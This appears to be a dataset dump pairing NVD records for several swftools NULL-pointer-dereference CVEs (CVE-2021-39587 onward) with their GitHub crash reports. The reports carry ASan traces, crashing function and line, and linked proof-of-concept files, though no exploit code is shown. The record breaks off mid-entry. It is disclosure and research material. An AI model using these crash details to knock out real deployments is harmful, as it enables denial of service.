[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/133" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/133" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "192BB2B1-5CB5-4E87-AAB7-51ACC07D8934", "versionEndExcluding": null, "versionEndIncluding": "2020-07-10", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/matthiaskramm/swftools/issues/133
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
## System info Ubuntu x86_64, clang 6.0, swfdump (latest master [fad6c2](https://github.com/matthiaskramm/swftools/commit/fad6c2e7505efa62e68375d061a508f802c3e77c)) ## Command line ./src/swfdump -D @@ ## Output ``` Segmentation fault (core dumped) ``` ## AddressSanitizer output ``` ASAN:SIGSEGV ================================================================= ==31886==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000018 (pc 0x55d8b550d4f4 bp 0x60200000e6f0 sp 0x7ffe6a230970 T0) #0 0x55d8b550d4f3 in traits_dump as3/abc.c:602 #1 0x55d8b5516ebc in swf_DumpABC as3/abc.c:689 #2 0x55d8b548d038 in main /home/seviezhou/swftools/src/swfdump.c:1578 #3 0x7f8c5b793b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #4 0x55d8b5490439 in _start (/home/seviezhou/swftools/src/swfdump+0xd0439) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV as3/abc.c:602 traits_dump ==31886==ABORTING ``` ## POC [SEGV-traits_dump-abc-602.zip](https://github.com/matthiaskramm/swftools/files/5032776/SEGV-traits_dump-abc-602.zip)
A Segmentation fault in abc.c:602
https://api.github.com/repos/swftools/swftools/issues/133/comments
0
2020-08-06T05:33:14Z
2020-08-06T05:33:14Z
https://github.com/swftools/swftools/issues/133
674,030,124
133
2,583
CVE-2021-39587
2021-09-20T16:15:14.037
An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function swf_DumpABC() located in abc.c. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/129" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/129" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "192BB2B1-5CB5-4E87-AAB7-51ACC07D8934", "versionEndExcluding": null, "versionEndIncluding": "2020-07-10", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/matthiaskramm/swftools/issues/129
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
## System info Ubuntu x86_64, clang 6.0, swfdump (latest master [fad6c2](https://github.com/matthiaskramm/swftools/commit/fad6c2e7505efa62e68375d061a508f802c3e77c)) ## Command line ./src/swfdump -D @@ ## Output ``` Segmentation fault (core dumped) ``` ## AddressSanitizer output ``` ASAN:SIGSEGV ================================================================= ==55887==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x5608561c25bc bp 0x5608562873e0 sp 0x7ffd9e332360 T0) #0 0x5608561c25bb in swf_DumpABC as3/abc.c:625 #1 0x560856139038 in main /home/seviezhou/swftools/src/swfdump.c:1578 #2 0x7f84a4ac5b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #3 0x56085613c439 in _start (/home/seviezhou/swftools/src/swfdump+0xd0439) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV as3/abc.c:625 swf_DumpABC ==55887==ABORTING ``` ## POC [SEGV-swf_DumpABC-abc-625.zip](https://github.com/matthiaskramm/swftools/files/5032741/SEGV-swf_DumpABC-abc-625.zip)
A Segmentation fault in abc.c:625
https://api.github.com/repos/swftools/swftools/issues/129/comments
0
2020-08-06T05:22:26Z
2020-08-06T05:22:26Z
https://github.com/swftools/swftools/issues/129
674,025,867
129
2,584
CVE-2021-39588
2021-09-20T16:15:14.077
An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function swf_ReadABC() located in abc.c. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/131" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/131" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "192BB2B1-5CB5-4E87-AAB7-51ACC07D8934", "versionEndExcluding": null, "versionEndIncluding": "2020-07-10", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/matthiaskramm/swftools/issues/131
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
## System info Ubuntu x86_64, clang 6.0, swfdump (latest master [fad6c2](https://github.com/matthiaskramm/swftools/commit/fad6c2e7505efa62e68375d061a508f802c3e77c)) ## Command line ./src/swfdump -D @@ ## Output ``` Segmentation fault (core dumped) ``` ## AddressSanitizer output ``` ASAN:SIGSEGV ================================================================= ==2802==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f45887cf5a1 bp 0x7fff919601d0 sp 0x7fff9195f958 T0) #0 0x7f45887cf5a0 (/lib/x86_64-linux-gnu/libc.so.6+0x18e5a0) #1 0x7f4588cb11a8 in strdup (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x621a8) #2 0x55fe30156341 in swf_ReadABC as3/abc.c:772 #3 0x55fe300cb003 in main /home/seviezhou/swftools/src/swfdump.c:1577 #4 0x7f4588662b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #5 0x55fe300ce439 in _start (/home/seviezhou/swftools/src/swfdump+0xd0439) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV ??:0 ?? ==2802==ABORTING ``` ## POC [SEGV-swf_ReadABC-abc-772.zip](https://github.com/matthiaskramm/swftools/files/5032758/SEGV-swf_ReadABC-abc-772.zip)
A Segmentation fault in abc.c:772
https://api.github.com/repos/swftools/swftools/issues/131/comments
0
2020-08-06T05:26:14Z
2020-08-06T05:26:14Z
https://github.com/swftools/swftools/issues/131
674,027,398
131
2,585
CVE-2021-39589
2021-09-20T16:15:14.120
An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function parse_metadata() located in abc.c. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/132" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/132" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "192BB2B1-5CB5-4E87-AAB7-51ACC07D8934", "versionEndExcluding": null, "versionEndIncluding": "2020-07-10", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/matthiaskramm/swftools/issues/132
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
## System info Ubuntu x86_64, clang 6.0, swfdump (latest master [fad6c2](https://github.com/matthiaskramm/swftools/commit/fad6c2e7505efa62e68375d061a508f802c3e77c)) ## Command line ./src/swfdump -D @@ ## Output ``` Segmentation fault (core dumped) ``` ## AddressSanitizer output ``` ASAN:SIGSEGV ================================================================= ==8690==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f313ccbe5a1 bp 0x7ffc2709bf80 sp 0x7ffc2709b708 T0) #0 0x7f313ccbe5a0 (/lib/x86_64-linux-gnu/libc.so.6+0x18e5a0) #1 0x7f313d1a01a8 in strdup (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x621a8) #2 0x5620848cb8e0 in parse_metadata as3/abc.c:91 #3 0x5620848cb8e0 in swf_ReadABC as3/abc.c:806 #4 0x562084840003 in main /home/seviezhou/swftools/src/swfdump.c:1577 #5 0x7f313cb51b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #6 0x562084843439 in _start (/home/seviezhou/swftools/src/swfdump+0xd0439) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV ??:0 ?? ==8690==ABORTING ``` ## POC [SEGV-parse_metadata-abc-91.zip](https://github.com/matthiaskramm/swftools/files/5032770/SEGV-parse_metadata-abc-91.zip)
A Segmentation fault in abc.c:91
https://api.github.com/repos/swftools/swftools/issues/132/comments
0
2020-08-06T05:30:23Z
2020-08-06T05:30:23Z
https://github.com/swftools/swftools/issues/132
674,029,141
132
2,586
CVE-2021-39590
2021-09-20T16:15:14.163
An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function params_dump() located in abc.c. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/137" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/137" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "192BB2B1-5CB5-4E87-AAB7-51ACC07D8934", "versionEndExcluding": null, "versionEndIncluding": "2020-07-10", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/matthiaskramm/swftools/issues/137
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
## System info Ubuntu x86_64, clang 6.0, swfdump (latest master [fad6c2](https://github.com/matthiaskramm/swftools/commit/fad6c2e7505efa62e68375d061a508f802c3e77c)) ## Command line ./src/swfdump -D @@ ## Output ``` Segmentation fault (core dumped) ``` ## AddressSanitizer output ``` ASAN:SIGSEGV ================================================================= ==65202==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f4e7a0295a1 bp 0x000000000000 sp 0x7ffeec6b0328 T0) #0 0x7f4e7a0295a0 (/lib/x86_64-linux-gnu/libc.so.6+0x18e5a0) #1 0x7f4e79f1a204 in fputs (/lib/x86_64-linux-gnu/libc.so.6+0x7f204) #2 0x555f109567ea in fprintf /usr/include/x86_64-linux-gnu/bits/stdio2.h:97 #3 0x555f109567ea in params_dump as3/abc.c:58 #4 0x555f109567ea in dump_method as3/abc.c:369 #5 0x555f10961433 in swf_DumpABC as3/abc.c:722 #6 0x555f108d7038 in main /home/seviezhou/swftools/src/swfdump.c:1578 #7 0x7f4e79ebcb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #8 0x555f108da439 in _start (/home/seviezhou/swftools/src/swfdump+0xd0439) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV ??:0 ?? ==65202==ABORTING ``` ## POC [SEGV-params_dump-abc-58.zip](https://github.com/matthiaskramm/swftools/files/5032826/SEGV-params_dump-abc-58.zip)
A Segmentation fault in abc.c:58
https://api.github.com/repos/swftools/swftools/issues/137/comments
0
2020-08-06T05:47:16Z
2020-08-06T05:47:16Z
https://github.com/swftools/swftools/issues/137
674,035,556
137
2,587
CVE-2021-39591
2021-09-20T16:15:14.203
An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function swf_GetShapeBoundingBox() located in swfshape.c. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/135" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/135" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "192BB2B1-5CB5-4E87-AAB7-51ACC07D8934", "versionEndExcluding": null, "versionEndIncluding": "2020-07-10", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/matthiaskramm/swftools/issues/135
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
## System info Ubuntu x86_64, clang 6.0, swfdump (latest master [fad6c2](https://github.com/matthiaskramm/swftools/commit/fad6c2e7505efa62e68375d061a508f802c3e77c)) ## Command line ./src/swfdump -D @@ ## Output ``` Segmentation fault (core dumped) ``` ## AddressSanitizer output ``` ASAN:SIGSEGV ================================================================= ==10774==ERROR: AddressSanitizer: SEGV on unknown address 0x0000000000ba (pc 0x556daa02bdc9 bp 0x60400000df90 sp 0x7ffda9d04de0 T0) #0 0x556daa02bdc8 in swf_GetShapeBoundingBox modules/swfshape.c:783 #1 0x556daa03b9d9 in swf_FontExtract_DefineFont2 modules/swftext.c:356 #2 0x556daa03d414 in swf_FontExtract modules/swftext.c:602 #3 0x556da9ffe5dc in fontcallback2 /home/seviezhou/swftools/src/swfdump.c:941 #4 0x556daa036920 in swf_FontEnumerate modules/swftext.c:133 #5 0x556da9ffb273 in main /home/seviezhou/swftools/src/swfdump.c:1296 #6 0x7f03a464db96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #7 0x556da9ffe439 in _start (/home/seviezhou/swftools/src/swfdump+0xd0439) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV modules/swfshape.c:783 swf_GetShapeBoundingBox ==10774==ABORTING ``` ## POC [SEGV-swf_GetShapeBoundingBox-swfshape-783.zip](https://github.com/matthiaskramm/swftools/files/5032795/SEGV-swf_GetShapeBoundingBox-swfshape-783.zip)
A Segmentation fault in swfshape.c:783
https://api.github.com/repos/swftools/swftools/issues/135/comments
0
2020-08-06T05:38:56Z
2020-08-06T05:38:56Z
https://github.com/swftools/swftools/issues/135
674,032,315
135
2,588
CVE-2021-39592
2021-09-20T16:15:14.247
An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function pool_lookup_uint() located in pool.c. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/138" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/138" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "192BB2B1-5CB5-4E87-AAB7-51ACC07D8934", "versionEndExcluding": null, "versionEndIncluding": "2020-07-10", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/matthiaskramm/swftools/issues/138
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
## System info Ubuntu x86_64, clang 6.0, swfdump (latest master [fad6c2](https://github.com/matthiaskramm/swftools/commit/fad6c2e7505efa62e68375d061a508f802c3e77c)) ## Command line ./src/swfdump -D @@ ## Output ``` Segmentation fault (core dumped) ``` ## AddressSanitizer output ``` ASAN:SIGSEGV ================================================================= ==35659==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55a669cff4d8 bp 0x60200000ed10 sp 0x7fffe1102550 T0) #0 0x55a669cff4d7 in pool_lookup_uint as3/pool.c:1024 #1 0x55a669cffcda in constant_fromindex as3/pool.c:736 #2 0x55a669cf2a1d in swf_ReadABC as3/abc.c:789 #3 0x55a669c65003 in main /home/seviezhou/swftools/src/swfdump.c:1577 #4 0x7ff7316aab96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #5 0x55a669c68439 in _start (/home/seviezhou/swftools/src/swfdump+0xd0439) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV as3/pool.c:1024 pool_lookup_uint ==35659==ABORTING ``` ## POC [SEGV-pool_lookup_uint-pool-1024.zip](https://github.com/matthiaskramm/swftools/files/5032842/SEGV-pool_lookup_uint-pool-1024.zip)
A Segmentation fault in pool.c:1024
https://api.github.com/repos/swftools/swftools/issues/138/comments
0
2020-08-06T05:51:12Z
2020-08-06T05:51:12Z
https://github.com/swftools/swftools/issues/138
674,037,087
138
2,589
CVE-2021-39593
2021-09-20T16:15:14.287
An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function swf_FontExtract_DefineFontInfo() located in swftext.c. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/139" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/139" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "192BB2B1-5CB5-4E87-AAB7-51ACC07D8934", "versionEndExcluding": null, "versionEndIncluding": "2020-07-10", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/matthiaskramm/swftools/issues/139
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
## System info Ubuntu x86_64, clang 6.0, swfdump (latest master [fad6c2](https://github.com/matthiaskramm/swftools/commit/fad6c2e7505efa62e68375d061a508f802c3e77c)) ## Command line ./src/swfdump -D @@ ## Output ``` Segmentation fault (core dumped) ``` ## AddressSanitizer output ``` ASAN:SIGSEGV ================================================================= ==75376==ERROR: AddressSanitizer: SEGV on unknown address 0x61900004697c (pc 0x560559a71dfc bp 0x000000008c00 sp 0x7ffde49444e0 T0) #0 0x560559a71dfb in swf_FontExtract_DefineFontInfo modules/swftext.c:225 #1 0x560559a773e6 in swf_FontExtract modules/swftext.c:611 #2 0x560559a385dc in fontcallback2 /home/seviezhou/swftools/src/swfdump.c:941 #3 0x560559a70920 in swf_FontEnumerate modules/swftext.c:133 #4 0x560559a35273 in main /home/seviezhou/swftools/src/swfdump.c:1296 #5 0x7fcbe4de6b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #6 0x560559a38439 in _start (/home/seviezhou/swftools/src/swfdump+0xd0439) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV modules/swftext.c:225 swf_FontExtract_DefineFontInfo ==75376==ABORTING ``` ## POC [SEGV-swf_FontExtract_DefineFontInfo-swftext-225.zip](https://github.com/matthiaskramm/swftools/files/5032852/SEGV-swf_FontExtract_DefineFontInfo-swftext-225.zip)
A Segmentation fault in swftext.c:225
https://api.github.com/repos/swftools/swftools/issues/139/comments
0
2020-08-06T05:53:11Z
2020-08-06T05:53:11Z
https://github.com/swftools/swftools/issues/139
674,037,899
139
2,590
CVE-2021-39594
2021-09-20T16:15:14.330
Other An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function updateusage() located in swftext.c. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, 